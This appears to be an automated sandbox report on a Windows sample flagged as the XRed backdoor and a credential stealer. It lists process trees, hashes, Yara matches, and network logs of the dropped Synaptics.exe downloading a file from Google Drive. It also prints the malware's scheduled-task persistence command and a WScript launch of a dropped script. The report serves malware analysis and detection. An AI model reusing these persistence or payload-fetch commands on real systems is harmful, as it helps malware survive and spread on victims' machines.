2024-12-30 10:34:31 UTC	51	IN	Data Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: his server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.8	49716	172.217.16.206	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:31 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:34:31 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:31 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: script-src 'report-sample' 'nonce-JpV8hamAX6p3FHGuaPvD0A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.8	49717	172.217.16.206	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:31 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:34:31 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:31 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-MMe4Tb6arj_EGGfCoYq2Uw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.8	49721	142.250.185.193	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:38 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=Ped9FFu77ZILljDRdPx4jmMXgH_9clhvCrKcOs0vHo5Wh5NQRqtD2bTclKsZHpXc_yNTCnedWDYMKz3uCDArCyXwnKDw6vH-8GIIWrExz2AkW205gWJXFurdY0IJGp63ZylB0bEx3aie6cdBXZS-_R3SSHM6X3X9WwZL56Wjt5UdLiU7-iFR_yg
2024-12-30 10:34:38 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC5MOdsMS9KwVoKhp4-uobBjly47LrC_d_StgbXjCxzPyxTQOxbztRhPV1_lKpPb60sD Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:38 GMT Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-rA1N6EBTeHmyzOzX0eCDyA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:34:38 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:34:38 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 4c 6d 4c 59 75 4f 4a 31 59 30 78 79 57 66 5f 30 45 54 52 67 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="WLmLYuOJ1Y0xyWf_0ETRgQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:34:38 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49725	142.250.185.193	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:38 UTC	387	OUT	GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Cache-Control: no-cache Host: drive.usercontent.google.com Connection: Keep-Alive Cookie: NID=520=b1T8znPmh3zSMqQEaToyoyRR9X7BvTrQG4NcFjWxcs5T5xI3izk4l5pYgmo3LnBbUuh724lxK41R0ljONN_39-P4Okj2pNHYDUcv4mYcXn-23pqVqy7cjDrErXAy4iNrt2dW3TbnBbmAIj_7BLQGQmvnSpM5VdzQNxSbC-2fZwUqd-RZQ6y5YrY
2024-12-30 10:34:38 UTC	1243	IN	HTTP/1.1 404 Not Found X-GUploader-UploadID: AFiumC7XEmoZLgH5Fm9-v4-H_mQ85b61KP1oWHkMlt2NEtwWau7v0JES7SD-mEsa4uX4fNRL Content-Type: text/html; charset=utf-8 Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:38 GMT Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-l6_yqnUDhPkx2xJ1KyRNGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Content-Length: 1652 Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Content-Security-Policy: sandbox allow-scripts Connection: close
2024-12-30 10:34:38 UTC	147	IN	Data Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:34:38 UTC	1390	IN	Data Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 76 72 44 37 47 55 62 53 73 78 55 73 4d 6c 64 33 48 47 4a 32 69 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 Data Ascii: t Found)!!1</title><style nonce="vrD7GUbSsxUsMld3HGJ2ig">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:34:38 UTC	115	IN	Data Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49723	172.217.16.206	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:38 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:34:38 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:38 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Content-Security-Policy: script-src 'report-sample' 'nonce-Y3bJEG5p0TCqg2Ba5miLCQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Cross-Origin-Opener-Policy: same-origin Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49724	172.217.16.206	443	8036	C:\ProgramData\Synaptics\Synaptics.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-30 10:34:38 UTC	143	OUT	GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 User-Agent: Synaptics.exe Host: docs.google.com Cache-Control: no-cache
2024-12-30 10:34:38 UTC	1314	IN	HTTP/1.1 303 See Other Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 30 Dec 2024 10:34:38 GMT Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download Strict-Transport-Security: max-age=31536000 Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-form-factors=, ch-ua-platform=, ch-ua-platform-version=* Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-DFAUUBpDwP7UUzXPFjwRoQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self' Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Target ID:	0
Start time:	05:34:19
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\FGNEBI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FGNEBI.exe"
Imagebase:	0x400000
File size:	1'691'136 bytes
MD5 hash:	1585CB2963DCEB92FBCF6C4C057E191E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1399677835.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:34:19
Start date:	30/12/2024
Path:	C:\Users\user\Desktop\._cache_FGNEBI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\._cache_FGNEBI.exe"
Imagebase:	0xd90000
File size:	919'552 bytes
MD5 hash:	66A4951D384B55633AB61ADD85514F07
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2668876953.000000000485E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.2669135026.00000000048EE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	05:34:19
Start date:	30/12/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	84A6CCB0838DA0E05CC6763275C2EE1C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1490710331.000000000062D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 92%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	05:34:21
Start date:	30/12/2024
Path:	C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0xb00000
File size:	53'161'064 bytes
MD5 hash:	4A871771235598812032C822E6F68F19
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	05:34:22
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:34:22
Start date:	30/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	05:34:22
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs
Imagebase:	0xd80000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2657472452.0000000000B90000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2657921440.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	05:34:22
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
Imagebase:	0x780000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	05:34:24
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Imagebase:	0x1e0000
File size:	919'552 bytes
MD5 hash:	66A4951D384B55633AB61ADD85514F07
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 47%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	05:34:31
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
Imagebase:	0x2b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	05:34:33
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
Imagebase:	0x1e0000
File size:	919'552 bytes
MD5 hash:	66A4951D384B55633AB61ADD85514F07
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	05:34:37
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2908
Imagebase:	0x2b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	05:34:40
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 1292
Imagebase:	0x2b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	05:34:40
Start date:	30/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8036 -s 2772
Imagebase:	0x2b0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	05:34:41
Start date:	30/12/2024
Path:	C:\ProgramData\Synaptics\Synaptics.exe
Wow64 process (32bit):	true
Commandline:	"C:\ProgramData\Synaptics\Synaptics.exe"
Imagebase:	0x400000
File size:	771'584 bytes
MD5 hash:	84A6CCB0838DA0E05CC6763275C2EE1C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	05:34:50
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
Imagebase:	0x1e0000
File size:	919'552 bytes
MD5 hash:	66A4951D384B55633AB61ADD85514F07
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	05:34:59
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
Imagebase:	0x1e0000
File size:	919'552 bytes
MD5 hash:	66A4951D384B55633AB61ADD85514F07
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	05:35:01
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Imagebase:	0x1e0000
File size:	919'552 bytes
MD5 hash:	66A4951D384B55633AB61ADD85514F07
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	05:36:00
Start date:	30/12/2024
Path:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
Imagebase:	0x1e0000
File size:	919'552 bytes
MD5 hash:	66A4951D384B55633AB61ADD85514F07
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	10.2%
Total number of Nodes:	2000
Total number of Limit Nodes:	31

Executed Functions

Function 00D9374E Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 145
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

